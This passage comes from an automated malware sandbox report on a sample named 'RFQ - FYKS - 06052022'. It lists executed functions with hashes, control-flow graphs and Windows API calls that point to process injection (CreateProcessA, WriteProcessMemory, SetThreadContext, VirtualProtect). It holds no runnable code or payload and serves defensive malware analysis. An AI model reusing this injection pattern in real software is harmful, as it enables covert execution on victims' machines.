16076->16077 16078 dd09d3 16076->16078 16077->16000 16078->16077 16080 1258b54 CreateProcessA 16078->16080 16081 1258b60 CreateProcessA 16078->16081 16079 dd0d3f 16079->16000 16080->16079 16081->16079 16083 dd0514 16082->16083 16084 dd03d8 16082->16084 16083->16000 16084->16083 16086 1255af0 VirtualProtect 16084->16086 16087 1255ae8 VirtualProtect 16084->16087 16085 dd0505 16085->16000 16086->16085 16087->16085

                                                                                        Executed Functions

                                                                                        Function 00C276A0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fish
                                                                                        • API String ID: 0-1064584243
                                                                                        • Opcode ID: 24c34fc3c37ac9a7aab3b435138abb931e1466fae68c9f7f1a17f989a703f573
                                                                                        • Instruction ID: 684a5c625a37f62b44ef04bc0d78db806da98b8f172784631a26d00e768be064
                                                                                        • Opcode Fuzzy Hash: 24c34fc3c37ac9a7aab3b435138abb931e1466fae68c9f7f1a17f989a703f573
                                                                                        • Instruction Fuzzy Hash: A2919E70A043169FDB04DFA5E894AAEB7F2FF84314F508929E502E7791DB70AD05CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01252240 Relevance: 1.2, Instructions: 1217COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e026af7d88855e92e651045771575d2f14189295a514128cb7fa520698b52176
                                                                                        • Instruction ID: 1054b420aba1317844898b80e5b8f640e907b80918cc8770209c5f13d46318de
                                                                                        • Opcode Fuzzy Hash: e026af7d88855e92e651045771575d2f14189295a514128cb7fa520698b52176
                                                                                        • Instruction Fuzzy Hash: 88B22436A10115DFCB55DFA8C984E98BBB2FF49314B1680D8E60AAB272C731ED91DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012514E8 Relevance: 1.2, Instructions: 1181COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 82b6ffb13b85eae7a71d3c7ba2c049ae38f66b768db6e160be123a45cd628881
                                                                                        • Instruction ID: bcdf5f270d671abb438adb91615d8f07f639e10c700467cdaea46f1d9af95a44
                                                                                        • Opcode Fuzzy Hash: 82b6ffb13b85eae7a71d3c7ba2c049ae38f66b768db6e160be123a45cd628881
                                                                                        • Instruction Fuzzy Hash: 5EA2D135A04215CFCB15CF69C890AADBBF2FF89310B1984A9E945DB3A2DB34ED51CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C20490 Relevance: .8, Instructions: 778COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a731ee85f7204f98235bc1fe7919f09227de4aef019a389cc9990f9de2a7660c
                                                                                        • Instruction ID: 5f1291e0c58a8e2b028a81da8a9954109be3ab7bed392a3bf82f4a3cde55477c
                                                                                        • Opcode Fuzzy Hash: a731ee85f7204f98235bc1fe7919f09227de4aef019a389cc9990f9de2a7660c
                                                                                        • Instruction Fuzzy Hash: 2152B4307001148FDB19AB68C854BAE76E7EFC9308F1180A9D10A9B7B6CF75EC55DBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C25EE8 Relevance: .8, Instructions: 767COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a23d3e23f9e1e35ed3be744c4ad3f52c955aabc016fcc773f507db492cb70853
                                                                                        • Instruction ID: e971603c4533077c6f6a25dcf7dac8e80959374a8d21ad8827b8e790e16bf4b2
                                                                                        • Opcode Fuzzy Hash: a23d3e23f9e1e35ed3be744c4ad3f52c955aabc016fcc773f507db492cb70853
                                                                                        • Instruction Fuzzy Hash: 2652B234B04225CFCB24DF68E494A6E77B2AF89304F258069E416DBBA1DF35DD41CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01250680 Relevance: .7, Instructions: 747COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6dadad3d77d20be9ca6e4ca6a5c9116678be19128053a2f87490909530c4a553
                                                                                        • Instruction ID: b6e4180c8ebc6252572ea164d0a010b391a6c826422822b58eeb5e00b8e0f1ae
                                                                                        • Opcode Fuzzy Hash: 6dadad3d77d20be9ca6e4ca6a5c9116678be19128053a2f87490909530c4a553
                                                                                        • Instruction Fuzzy Hash: 4362E031604255CFCB15CF65C890CAEBBF2FF8A300B19C5AAE5469B266DB34ED45CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012553B0 Relevance: .6, Instructions: 618COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 166fed0284afdc3d8b994f4016a495c72df055d1d0156e9761c40d1f3c08980d
                                                                                        • Instruction ID: 544274179e25385679d6a96cd88a22b57ebdff6650a49998002b4bfbdcf54c71
                                                                                        • Opcode Fuzzy Hash: 166fed0284afdc3d8b994f4016a495c72df055d1d0156e9761c40d1f3c08980d
                                                                                        • Instruction Fuzzy Hash: C232D035A14215CFCB05DF65D8809AEBBF3FF89300B1585AAE9059B3A2DB35EC45CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012541E7 Relevance: .6, Instructions: 612COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a4f49db2fa7e00b03ce68599a7f7b24eee3c82473cbb1f0b229d66817739e53c
                                                                                        • Instruction ID: 6368b7bbeb5a5be963365a43a3abbcfe50ce1f1038e3501754541e277370ae49
                                                                                        • Opcode Fuzzy Hash: a4f49db2fa7e00b03ce68599a7f7b24eee3c82473cbb1f0b229d66817739e53c
                                                                                        • Instruction Fuzzy Hash: 70428A31A10645CFCB55DF68C9849AEFBF2FF98310B198669D846AB751E730F881CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C20460 Relevance: .6, Instructions: 608COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65089b8bc7ebbc8760b446fcee33e6905f9bce0a56e879c676be7e359b8156a5
                                                                                        • Instruction ID: 5dc6e2271fbae007ef75fbfc5cae2944bed2fb178a758985d0efc74f564c371b
                                                                                        • Opcode Fuzzy Hash: 65089b8bc7ebbc8760b446fcee33e6905f9bce0a56e879c676be7e359b8156a5
                                                                                        • Instruction Fuzzy Hash: AF329230B001149FDB199B68C854FAA77E3EF89304F1180A8E10A9B7B6CF75ED55DBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C2DB88 Relevance: .4, Instructions: 407COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a2c89ea4351cd753669b016b34e9da2e34dc8b22dc685e838c8b8c80b5763c2
                                                                                        • Instruction ID: 2b39f0494f05008abfbbcc08586143b4f5435cfb745dfc789dab0b6cfcfa31a6
                                                                                        • Opcode Fuzzy Hash: 6a2c89ea4351cd753669b016b34e9da2e34dc8b22dc685e838c8b8c80b5763c2
                                                                                        • Instruction Fuzzy Hash: 3CF1C230A042258FCB05CF69D8809AEBBF3FFC9300B15C569E546EB765DB30A945CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29A78 Relevance: .3, Instructions: 303COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 25d00b78a9f0c8de2d3a91a4ca0799efda5599ff9667c14bfce7d438fb41bf06
                                                                                        • Instruction ID: f6dfa32d4531d8e6a19a8d2a918ad3a413620208ffcff9199c9f5fccae03775c
                                                                                        • Opcode Fuzzy Hash: 25d00b78a9f0c8de2d3a91a4ca0799efda5599ff9667c14bfce7d438fb41bf06
                                                                                        • Instruction Fuzzy Hash: EFD12735A00219CFCB15CF64D8849ADBBB2FF88314F1AC555E855AB361DB31E986CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01258B54 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 1258b54-1258bf5 2 1258bf7-1258c01 0->2 3 1258c2e-1258c4e 0->3 2->3 4 1258c03-1258c05 2->4 10 1258c87-1258cb6 3->10 11 1258c50-1258c5a 3->11 5 1258c07-1258c11 4->5 6 1258c28-1258c2b 4->6 8 1258c15-1258c24 5->8 9 1258c13 5->9 6->3 8->8 12 1258c26 8->12 9->8 17 1258cef-1258da9 CreateProcessA 10->17 18 1258cb8-1258cc2 10->18 11->10 13 1258c5c-1258c5e 11->13 12->6 15 1258c81-1258c84 13->15 16 1258c60-1258c6a 13->16 15->10 19 1258c6c 16->19 20 1258c6e-1258c7d 16->20 31 1258db2-1258e38 17->31 32 1258dab-1258db1 17->32 18->17 21 1258cc4-1258cc6 18->21 19->20 20->20 22 1258c7f 20->22 23 1258ce9-1258cec 21->23 24 1258cc8-1258cd2 21->24 22->15 23->17 26 1258cd4 24->26 27 1258cd6-1258ce5 24->27 26->27 27->27 28 1258ce7 27->28 28->23 42 1258e48-1258e4c 31->42 43 1258e3a-1258e3e 31->43 32->31 45 1258e5c-1258e60 42->45 46 1258e4e-1258e52 42->46 43->42 44 1258e40 43->44 44->42 48 1258e70-1258e74 45->48 49 1258e62-1258e66 45->49 46->45 47 1258e54 46->47 47->45 50 1258e86-1258e8d 48->50 51 1258e76-1258e7c 48->51 49->48 52 1258e68 49->52 53 1258ea4 50->53 54 1258e8f-1258e9e 50->54 51->50 52->48 56 1258ea5 53->56 54->53 56->56
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01258D96
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 23be5f3b3413c401ca653e39d7b00681f6857f00c50ff2c7085d649c49776e96
                                                                                        • Instruction ID: a5943712829986a3f3e884a9f18cbe1eeedbf49e2a475b5512855475c9583f92
                                                                                        • Opcode Fuzzy Hash: 23be5f3b3413c401ca653e39d7b00681f6857f00c50ff2c7085d649c49776e96
                                                                                        • Instruction Fuzzy Hash: 3AA1BC31D10219CFDF24DF69C8817EDBBB2BF48314F048569E908A7240DBB49985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01258B60 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 57 1258b60-1258bf5 59 1258bf7-1258c01 57->59 60 1258c2e-1258c4e 57->60 59->60 61 1258c03-1258c05 59->61 67 1258c87-1258cb6 60->67 68 1258c50-1258c5a 60->68 62 1258c07-1258c11 61->62 63 1258c28-1258c2b 61->63 65 1258c15-1258c24 62->65 66 1258c13 62->66 63->60 65->65 69 1258c26 65->69 66->65 74 1258cef-1258da9 CreateProcessA 67->74 75 1258cb8-1258cc2 67->75 68->67 70 1258c5c-1258c5e 68->70 69->63 72 1258c81-1258c84 70->72 73 1258c60-1258c6a 70->73 72->67 76 1258c6c 73->76 77 1258c6e-1258c7d 73->77 88 1258db2-1258e38 74->88 89 1258dab-1258db1 74->89 75->74 78 1258cc4-1258cc6 75->78 76->77 77->77 79 1258c7f 77->79 80 1258ce9-1258cec 78->80 81 1258cc8-1258cd2 78->81 79->72 80->74 83 1258cd4 81->83 84 1258cd6-1258ce5 81->84 83->84 84->84 85 1258ce7 84->85 85->80 99 1258e48-1258e4c 88->99 100 1258e3a-1258e3e 88->100 89->88 102 1258e5c-1258e60 99->102 103 1258e4e-1258e52 99->103 100->99 101 1258e40 100->101 101->99 105 1258e70-1258e74 102->105 106 1258e62-1258e66 102->106 103->102 104 1258e54 103->104 104->102 107 1258e86-1258e8d 105->107 108 1258e76-1258e7c 105->108 106->105 109 1258e68 106->109 110 1258ea4 107->110 111 1258e8f-1258e9e 107->111 108->107 109->105 113 1258ea5 110->113 111->110 113->113
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01258D96
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 3bed725fb707679ad8ed75383276eb6ee6ce9c7e2f945d46c18bbb271a521684
                                                                                        • Instruction ID: 8ee42498304fa3a0fc7ff35b7203df4482850bc1674ce390f2f6c0c791e08d82
                                                                                        • Opcode Fuzzy Hash: 3bed725fb707679ad8ed75383276eb6ee6ce9c7e2f945d46c18bbb271a521684
                                                                                        • Instruction Fuzzy Hash: 5991BE71D10219CFDF24DF69C8817EDBBB2BF48314F048169E948A7280DBB49985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C20F8C Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 114 c20f8c-c20ff7 116 c2104b-c21097 LoadLibraryA 114->116 117 c20ff9-c2101e 114->117 120 c210a0-c210d1 116->120 121 c21099-c2109f 116->121 117->116 122 c21020-c21022 117->122 127 c210d3-c210d7 120->127 128 c210e1 120->128 121->120 124 c21024-c2102e 122->124 125 c21045-c21048 122->125 129 c21032-c21041 124->129 130 c21030 124->130 125->116 127->128 132 c210d9 127->132 133 c210e2 128->133 129->129 131 c21043 129->131 130->129 131->125 132->128 133->133
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 00C21087
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: f087187242dea27addde3142e4a6370127d0d5d33db5227b72770ac5a248dbc2
                                                                                        • Instruction ID: 69ae54a614c53dc7a2931e1df0d648cb40b09dbf598e80336d34dc00cbeab837
                                                                                        • Opcode Fuzzy Hash: f087187242dea27addde3142e4a6370127d0d5d33db5227b72770ac5a248dbc2
                                                                                        • Instruction Fuzzy Hash: 904188B0D002988FDB10CFA9D98178EBBF1FB48314F14812AE825E7790D7789986CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C20168 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 134 c20168-c20ff7 137 c2104b-c21097 LoadLibraryA 134->137 138 c20ff9-c2101e 134->138 141 c210a0-c210d1 137->141 142 c21099-c2109f 137->142 138->137 143 c21020-c21022 138->143 148 c210d3-c210d7 141->148 149 c210e1 141->149 142->141 145 c21024-c2102e 143->145 146 c21045-c21048 143->146 150 c21032-c21041 145->150 151 c21030 145->151 146->137 148->149 153 c210d9 148->153 154 c210e2 149->154 150->150 152 c21043 150->152 151->150 152->146 153->149 154->154
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 00C21087
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 4b9967e8c2ffd692f9b7ce62c18971c3526885f2078c2260b19ca82d73d88b4d
                                                                                        • Instruction ID: 5f6055e95ffffc54c59c5889233cef6e634fe1dd474ba95de922bfd5a4d41689
                                                                                        • Opcode Fuzzy Hash: 4b9967e8c2ffd692f9b7ce62c18971c3526885f2078c2260b19ca82d73d88b4d
                                                                                        • Instruction Fuzzy Hash: 4D418A70D006588FDB10CFA9D98179EBBF1FB48704F148129E825E7780D7749986CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012590E9 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 155 12590e9-125913e 157 1259140-125914c 155->157 158 125914e-125918d WriteProcessMemory 155->158 157->158 160 1259196-12591c6 158->160 161 125918f-1259195 158->161 161->160
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01259180
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: c15e44fc2d8307bbe7afce64fac6109d676fc5a11afa304ea6ab265cf4c75a37
                                                                                        • Instruction ID: 82905a9298fff3cdf82a224d38f77af6c8f7115313fc616a6aba9dafd28c06f3
                                                                                        • Opcode Fuzzy Hash: c15e44fc2d8307bbe7afce64fac6109d676fc5a11afa304ea6ab265cf4c75a37
                                                                                        • Instruction Fuzzy Hash: E42117759003199FCF10DFA9C8857DEBBF1FF48358F14842AE928A7240C7789954CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012590F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 165 12590f0-125913e 167 1259140-125914c 165->167 168 125914e-125918d WriteProcessMemory 165->168 167->168 170 1259196-12591c6 168->170 171 125918f-1259195 168->171 171->170
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01259180
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 2ac819e6b0d8dc7b7904d000abe919b87879215d8662bc8885fc3da0115ec621
                                                                                        • Instruction ID: 113ef1f1af3a9679bf4c1955cab1aa7b47b5fba802e1fc683d92d581d369360c
                                                                                        • Opcode Fuzzy Hash: 2ac819e6b0d8dc7b7904d000abe919b87879215d8662bc8885fc3da0115ec621
                                                                                        • Instruction Fuzzy Hash: FC2126759003199FCF10DFA9C884BDEBBF5FF48358F10842AE918A7240C7789944CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01256510 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 175 1256510-1256566 177 1256576-12565a3 SetKernelObjectSecurity 175->177 178 1256568-1256574 175->178 179 12565a5-12565ab 177->179 180 12565ac-12565d4 177->180 178->177 179->180
                                                                                        APIs
                                                                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 01256596
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: KernelObjectSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 3015937269-0
                                                                                        • Opcode ID: 419b79e783942db9bd1f34141970808561f327d3e0eb6ae465e30580a579782e
                                                                                        • Instruction ID: a8f3116564e0e4ef3ade1b1523fb70686641251f9afd4a70aa25a12c5c9ca3e7
                                                                                        • Opcode Fuzzy Hash: 419b79e783942db9bd1f34141970808561f327d3e0eb6ae465e30580a579782e
                                                                                        • Instruction Fuzzy Hash: 07215C71D002098FCB10CFA9C584BDEBBF4EF88314F158429E519A7340D778A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01258EE1 Relevance: 1.6, APIs: 1, Instructions: 66threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 183 1258ee1-1258f33 186 1258f35-1258f41 183->186 187 1258f43-1258f73 SetThreadContext 183->187 186->187 189 1258f75-1258f7b 187->189 190 1258f7c-1258fac 187->190 189->190
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 01258F66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: aab76547c0b1d8ceab168d07e241426db6afabaada98d87ed5359dba7c21437d
                                                                                        • Instruction ID: 138e561936a1623b6e89fb49b1f33325c705fcfef0767992d459e94bd03b4fbd
                                                                                        • Opcode Fuzzy Hash: aab76547c0b1d8ceab168d07e241426db6afabaada98d87ed5359dba7c21437d
                                                                                        • Instruction Fuzzy Hash: 81215C719043098FDB10DFAAC4847EEBBF4EF88314F54842EE518A7240CB789945CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01258EE8 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 194 1258ee8-1258f33 196 1258f35-1258f41 194->196 197 1258f43-1258f73 SetThreadContext 194->197 196->197 199 1258f75-1258f7b 197->199 200 1258f7c-1258fac 197->200 199->200
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 01258F66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: 5ffcc026322ff4716e9b5f9c9aadc67f2b07a42fbbf386170e1d1e4d421e88f1
                                                                                        • Instruction ID: 81cc25df92e51fb2d05fcc7f4e50af9fe242587cd430240ae2827648aa4efb28
                                                                                        • Opcode Fuzzy Hash: 5ffcc026322ff4716e9b5f9c9aadc67f2b07a42fbbf386170e1d1e4d421e88f1
                                                                                        • Instruction Fuzzy Hash: 20214C71D043098FDB10DFAAC4847EEBBF5EF48214F54842EE519A7240CB78A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01256518 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 204 1256518-1256566 206 1256576-12565a3 SetKernelObjectSecurity 204->206 207 1256568-1256574 204->207 208 12565a5-12565ab 206->208 209 12565ac-12565d4 206->209 207->206 208->209
                                                                                        APIs
                                                                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 01256596
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: KernelObjectSecurity
                                                                                        • String ID:
